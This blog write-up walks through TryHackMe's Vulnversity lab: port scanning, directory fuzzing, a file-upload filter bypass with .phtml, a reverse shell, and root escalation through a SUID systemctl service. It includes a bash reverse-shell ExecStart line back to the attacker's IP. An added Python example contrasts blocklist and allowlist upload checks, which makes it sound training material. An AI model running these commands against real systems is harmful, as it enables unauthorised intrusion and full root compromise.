Vulnversity Writeup - TryHackMe

Vulnversity

This room is based on active recon, web app attacks, and privilege escalation.


Task 1: Deployment

The first and most important task is to deploy the machine. Once it is live, the vulnerable machine is assigned an IP address, and all remaining tasks are performed against it. You can extend the machine time if needed.


Task 2: Reconnaissance

We begin by scanning the target machine using nmap.

Common Nmap Commands

nmap command flags

Nmap Scan Result

nmap -sC -sV -A -oN initial <machine IP>

nmap result

Key Observations:

  • 6 ports are open.
  • Squid version 3.5.12 is running.
  • OS is Ubuntu.
  • A web server is running on port 3333.

Additional answers:

  • -p-400 scans the first 400 ports.
  • -n disables DNS resolution.
TIP

If no ports or scan technique are specified, nmap scans the 1,000 most common ports for each protocol and uses its default -sS (TCP SYN) scan technique.

Task 3: Locating Directories Using FFUF

This task involves directory enumeration. Although the room mentions gobuster, we’ll use ffuf.

FFUF Command

ffuf -u http://<machine IP>:3333/FUZZ -w <wordlist path>

ffuf commands

FFUF Results

ffuf result

We found /internal, which contains a file upload form.


Task 4: Compromising the Web Server

Trying to upload a .php file gives this error:

upload error

How to Bypass?

Use BurpSuite’s Intruder to fuzz extensions. Try these:

  • .php, .php3, .php4, .php5, .phtml

burpsuite intruder

Paste the extensions into the payload.

extension list

.phtml is accepted, as its response size differs from the others:

different response

Upload a reverse shell as rev.phtml:

upload success

Start a listener with:

nc -lvnp 4444

Click the uploaded file and get a shell:

reverse shell

Check user info:

user info

User Flag

user flag

Key Takeaways:

  • .php is blocked, but .phtml is allowed.
  • Username is bill.
  • Found user flag.
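Why the bypass in Task 4 works, as an added example that is not part of the original writeup: the observed behaviour (.php rejected, .phtml accepted) is consistent with an extension blocklist. The two hypothetical checks below contrast that pattern with an allowlist of non-executable extensions, run against the same extension list the Intruder fuzz used.

```python
# Added example, not code from the room or the writeup: a blocklist-style
# upload filter (the pattern the room's behaviour suggests) beside an
# allowlist-style filter, tested against the extensions fuzzed in Task 4.
from pathlib import PurePosixPath

# The extension list fed to Burp Intruder in the writeup.
FUZZED_EXTENSIONS = [".php", ".php3", ".php4", ".php5", ".phtml"]


def blocklist_allows(filename: str, blocked=(".php",)) -> bool:
    """Vulnerable check: rejects only extensions on a blocklist.

    Any extension the server will still hand to the PHP interpreter
    (.phtml, .php5, ...) but that is missing from the list gets through.
    """
    return PurePosixPath(filename).suffix.lower() not in blocked


def allowlist_allows(filename: str, allowed=(".png", ".jpg", ".jpeg", ".gif")) -> bool:
    """Hardened check: accepts only a closed set of extensions.

    Also rejects path separators (name must be a bare file name) and
    multi-extension names such as shell.phtml.png, which some web server
    configurations still execute.
    """
    path = PurePosixPath(filename)
    if path.name != filename or len(path.suffixes) != 1:
        return False
    return path.suffix.lower() in allowed


def bypassing_extensions(check) -> list[str]:
    """Return the fuzzed extensions a given check would accept for rev.<ext>."""
    return [ext for ext in FUZZED_EXTENSIONS if check(f"rev{ext}")]


if __name__ == "__main__":
    print("blocklist accepts:", bypassing_extensions(blocklist_allows))
    print("allowlist accepts:", bypassing_extensions(allowlist_allows))
```

An extension allowlist is only one layer: on the server side the upload directory should also be served without script execution, and the stored name should be generated rather than taken from the client.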

Task 5: Privilege Escalation

Check for SUID binaries:

find / -type f -perm -04000 -ls 2>/dev/null

We find /bin/systemctl:

systemctl suid

Exploit with GTFOBins

Reference: GTFOBins - systemctl

The service file (root.service), adapted from the GTFOBins entry:

[Service]
Type=oneshot
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/<your-ip>/4445 0>&1'
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target

exploit code

Host it with:

python3 -m http.server 80

http server

Download it on the target:

wget http://<your-ip>/root.service

wget file

Link, enable and start the service (because of the SUID bit, systemctl runs these as root):

systemctl link /home/bill/root.service
systemctl enable root.service
systemctl start root.service

systemctl start

Catch the root shell:

root shell

Root Flag

During the privilege escalation phase, /bin/systemctl was identified as an unusual SUID binary. Exploiting it allowed us to escalate privileges and access the root shell.

The root flag obtained is:

a5...d5
Source: https://blog.hanzalaghayasabbasi.com/posts/vulnversity/
Author: Hanzala Ghayas Abbasi
Published: 2023-08-10
License: CC BY-NC-SA 4.0